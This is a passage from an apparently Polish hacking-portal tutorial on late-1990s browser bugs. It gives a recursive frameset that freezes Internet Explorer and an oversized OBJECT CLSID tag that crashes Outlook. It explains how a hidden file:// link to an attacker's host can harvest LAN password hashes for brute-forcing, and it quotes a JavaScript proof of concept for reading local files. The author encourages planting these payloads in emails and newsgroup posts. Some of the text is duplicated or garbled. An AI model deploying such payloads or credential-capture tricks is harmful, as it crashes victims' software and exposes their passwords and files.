[ Pobierz całość w formacie PDF ]
.html', który zawiera kolejne ramki `frame1' i `frame2' - i tak aż do wyczerpania zasobów. <HTML><FRAMESET COLS=”50,50”><FRAME NAME=”frame1” SRC=”test.html><FRAME NAME=”frame2” SRC=”test.html></FRAMESET></HTML>Zapiszmy powyższy kod html w pliku `test.html' - jego wykonanie w przeglądarce IE (3.0-4.0) spowoduje zawieszenie programu a przy pomyślnych okolicznościach całego systemu - błąd jest bardzo prosty, IE w nieskończoność ładuje ramki `frame1' i `frame2' stronami z pliku `test.html', który zawiera kolejne ramki `frame1' i `frame2' - i tak aż do wyczerpania zasobów.4.2 Buffer Overflow OBJECT<OBJECT CLSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>Wpisanie takiego TAG'a w strone html lub e-mail spowoduje wykrzaczenie się programu - w Outlooku na dodatek nie będzie można usunąć listu ze skrzynki bo za każdym razem gdy na niego klikniemy zawiesi nam się program, jeśli przez `przypadek' post trafi na pierwszą pozycję w jakieiś grupie dyskusyjnej to użytkownik w/w programu nie będzie mógł tam wejść bo automatycznie mu się otworzy post zawierający nasz `evil code', zamiast `AAAA' można prawdopodobnie wpisać kod wyknywalny, to tylko kwestia znajomości długości bufora.4.3 Przekazywanie haslaCzy przeglądarka www może wysłać do internetu nasze dane włączając w to login i hasło do sieci LAN ?Dla Wszystkich wersji systemu windows (9x, OSR2, 3.x, NT) odpowiedź brzmi: TAK, jeśli jest to wersja <=3.01 Internet Explorera lub Netscape Navigatora.Cały błąd polega na tym, że jeśli przeglądarka znajdzie w dokumencie adres w postaci:file://\aa.bb.cc.ddGdzie aa.bb.cc.dd jest numerem IP odległego hosta to próbuje się z nim połączyć wysyłając dane użytkownika LAN sądząc że ma do czynienia z serverem plików.Potwierdzanie autentyczności odbywa się w taki oto sposób:1) Najpierw server wysyła jakiś losowo wybrany ciąg znaków2) Komputer go odbiera i szyfruje używając jako klucza hasła użytkownika3) Zaszyfrowany text jest przesyłany do servera4) Następnie server po kolej szyfruje oryginalny text za pomocą wszystkich haseł w bazie danych jeśli zaszyfrowane hasło będzie takie samo jak to przesłane przez klienta to połączenie jest nawiązywane.W ten sposób sprawdzana jest autentyczność klienta bez przesyłania jego hasła przez sieć.Jest to robione bezgłośnie i bez rzadnej informacji, atak polega na tym aby w dokumencie ukryć adres o w/w formacie wskazującym na server jakiegoś hackera, na którym jest uruchamiana specjalnie zmodyfikowana wersja servera plików, mając do dyspozycji dane przesłane przez przeglądarka można zastosować tzw.atak brute force ew.z wykorzystaniem słownika, nawet jeśli to się nie powiedzie atakujący komputer ma sporo informacji o kliencie.4.4 Wysylanie pliku na obcy komputerJest błąd w IE, który pozwala przez specjalnie przygotowaną stronę www odczytaćtext lub plik HTML z komputera użytkownika i wysłać jego zawartość na inny komputer.Dzieje się to nawet kiedy użytkownik jest za firewallem.Błąd wykorzystuje Java Script a nazwa i położenie pliku muszą być znane.Innym sposobem na wykorzystanie tego błędu jest wysłanie specjalnie przygotowanejwiadomości do Outlook Expressa z IE4.The source of the page:----Cut here---<HTML><HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD><BODY>This demonstrates a bug in IE 4.01 under Windows 9x (don't know for other versions), which allows reading text or HTML file on the user's machine.<B>Create the file c:.txt</B> and its contents are shown in a message box.The file may be sent to an arbitrary server even if behind a firewall.<BR>To test it, you need Javascript enabled.<BR>This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A><br><SCRIPT LANGUAGE="JAVASCRIPT"><br>alert("This page demonstrates reading the file C:\test.txt (you may need to create a short file to view it)");var x=window.open('file://C:/test.txt');x.navigate("javascript:eval("var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);")");</SCRIPT></BODY></HTML>Spinaczmitnick@polbox.comnum.GG: 1338270Łukasz TarkowskiPrawa autorskie © [:::Secure Wortal:::] http://secure.hacking.la Wszystkie prawa zastrzeżone.Miejsce na reklamę::F11 pełny ekranWymagania:Microsoft Internet Explorer 5.01024x768KURSY: 6Progsy: 21E-book&FAQ: 8 designed by
[ Pobierz całość w formacie PDF ]